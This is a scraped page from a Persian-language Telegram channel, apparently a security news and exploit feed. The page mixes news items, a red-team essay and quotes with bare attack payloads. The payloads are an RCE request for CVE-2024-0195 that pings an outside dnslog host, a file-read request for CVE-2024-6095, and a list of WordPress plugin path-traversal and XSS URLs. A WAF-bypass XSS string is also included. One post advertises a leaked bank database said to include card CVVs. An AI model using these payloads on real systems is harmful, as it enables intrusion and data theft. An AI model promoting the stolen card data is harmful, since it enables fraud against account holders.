TGViewer
Channel Public Channel
P.F.K Security

P.F.K Security

@pfksecurity

APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Subscribers
2.1K
Photos
132
Videos
46
Links
422

Showing posts older than #584 · Back to latest

Older Posts 20 shown
Post #583 435
زمان مغز بزرگ

دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.

او اکنون با 30 سال زندان مواجه است.

https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/

@PfkSecurity
BleepingComputer Employee arrested for locking Windows admins out of 254 servers in extortion plot A former core infrastructure engineer at an industrial company headquartered in Somerset County, New Jersey, was arrested after locking Windows admins out of 254 servers in a failed extortion plot targeting his employer.
Post #580 473
CVE-2024-0195 Exploit

POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B

#exploit #poc
@PfkSecurity
Post #579 572
افزونه های وردپرس
____
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd


@PfkSecurity
Post #578 480
CVE-2024-6095

POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"url":"file:///etc/passwd"}

#exploit #poc

@PfkSecurity
Post #575 797
Xss Bypass Waf

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

@PfkSecurity
Post #574 708
BNKoFAmerica.txt120.4 MB
پایگاه داده 4.8 میلیون کاربر متعلق به Bank Of America

- شناسه کاربری، نام کامل، موجودی، تاریخ انقضا، نوع حساب، CVV
@PfkSecurity
Post #573 753
این را در مورد CSAM می‌گوید، اما تمام پیازها را در موتور جستجوی خود که هنوز CSAM دارند، حتی اگر قابل جستجو نباشد، فاش می‌کند. لطفا از Ahmia استفاده نکنید.

https://ahmia.fi/onions/
@pfksecurity
Post #563 612
گزارش باج‌افزار ThreatLabz 2024 Zscaler نشان می‌دهد که باج‌افزار DarkAnges بزرگترین پرداخت باج‌افزار تاریخ را دریافت کرده است: 75،000،000 دلار

برای درک این موضوع: کسی می تواند با این پول 524 مرسدس بنز G واگن 2024 بخرد.
Post #561 766
💡Hashmob
- بزرگترین انجمن بازیابی رمز عبور


HashMob
یک انجمن آنلاین بزرگ است که بر بازیابی رمز عبور و رمزنگاری متمرکز شده است. این به عنوان بستری برای همکاری کاربران در بهبود تحقیقات رمز عبور و کشف روندها عمل می کند. این انجمن منابعی مانند آمار، فهرست کلمات، قوانین، راهنماها و آموزش هایی را ارائه می دهد که برای محققان و آزمایش کنندگان نفوذ مفید است. علاوه بر این، HashMob از انواع الگوریتم‌های هش، از جمله الگوریتم‌های هش‌کت غیر باینری، پشتیبانی می‌کند و ابزارهایی برای بازیابی رمزهای عبور از فرمت‌هایی مانند MD5، SHA1، و ZIP و همچنین کیف پول‌های دیجیتالی مانند بیت‌کوین و اتریوم ارائه می‌کند.

HashMob[.]net
میزبان طیف وسیعی از منابع رسمی و فهرست هاست که برای تسهیل فعالیت های بازیابی رمز عبور استفاده می شود. این پلتفرم همچنین کاربران را تشویق می کند تا برای تعامل و پشتیبانی بیشتر به انجمن Discord خود بپیوندند .

لینک:
https://hashmob.net/
@PfkSecurity
Post #498 2.49K
اگر زمانی که پیروزی شما قطعی است و پرهزینه نخواهد بود، نمی جنگید. ممکن است به لحظه‌ای برسید که مجبور شوید با تمام شانس‌تان و تنها شانسی که در آن بقایی مخاطره‌آمیز در انتظارتان است ، مبارزه کنید. حتی ممکن است سرنوشت بدتری وجود داشته باشد، ممکن است مجبور شوید زمانی که امیدی به پیروزی وجود ندارد بجنگید، زیرا بهتر است از بین بروید تا مانند برده زندگی کنید.

#وینستون_چرچیل

@pfksecurity
  • ⚡ 2
  • 👍 1
Post #497 2.15K

Forwarded from Red Blue Team

🧩 اگر دنبال یک مکان برای منابع CTF هستید میتوانید از کانال ما استفاده کنید .

پست ها به دو زبان Persian & English می باشد .


🧩 If you are looking for a place for CTF resources, you can use our channel.


The posts are in Persian and English.

@PfkCTF
Post #496 2.03K
Post #495 1.54K
تیم قرمز می تواند برای بسیاری از افراد معانی زیادی داشته باشد. به معنای واقعی آن، و چگونه آن را در اینجا برای هدف این وبلاگ تعریف می‌کنم، تیم‌سازی قرمز روشی است برای اتخاذ طرز فکر متخاصم - فکر کردن مثل آدم بد یا اینکه چگونه یک موقعیت ممکن است اشتباه پیش برود. درک و مشاهده اینکه چگونه ممکن است همه چیز اشتباه پیش برود و چرا داشتن این طرز فکر در زندگی روزمره بسیار مهم است. با اعمال خشونت آمیز و وحشتناک تصادفی که ظاهراً هر روز اتفاق می افتد، مهم است که درک کنید چگونه انتقادی فکر کنید و آن را در زندگی خود به کار ببرید. برای تیم های قرمز، این مهم است و با گذشت زمان تبدیل به طبیعت دوم می شود. این بسیار مهم است زیرا این نوع تفکر انتقادی کاربردی مجموعه مهارت‌هایی را ایجاد می‌کند یا آن را از بین می‌برد.
پس از تقریباً 20 سال حضور و اجرای تمرینات تیم قرمز در داخل دولت ایالات متحده، اغلب از من می پرسند که چه درس هایی آموخته ام، برخی درس های مرتبط (و گاهی اوقات دشوار)، بنابراین شروع به جمع آوری لیستی از درس ها کردم. آموخته شده و در هنگام مدیریت تیم های قرمز خود باید به خاطر داشته باشید. در حالی که بسیاری از اینها مفاهیمی هستند، درس‌های بدی که آموخته‌اند، امیدوارم خواننده آن‌ها را در هنگام فرمول‌بندی و اجرای تیم‌های قرمز رنگ برانگیزاننده بیابد. مثل همیشه، بازخورد و نظرات استقبال می شود. در اینجا چند درس کلیدی برای به اشتراک گذاشتن با تیم خود آورده شده است.
- مقدمه
#redlearn
@PfkSecurity
  • 👍 7
  • 👎 1
Post #494 1.29K
درس های آموخته شده از سال ها تیم قرمز در امنیت سایبری

#redlearn
#RedTeam
@PfkSecurity
  • 👍 4
  • 👎 1
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →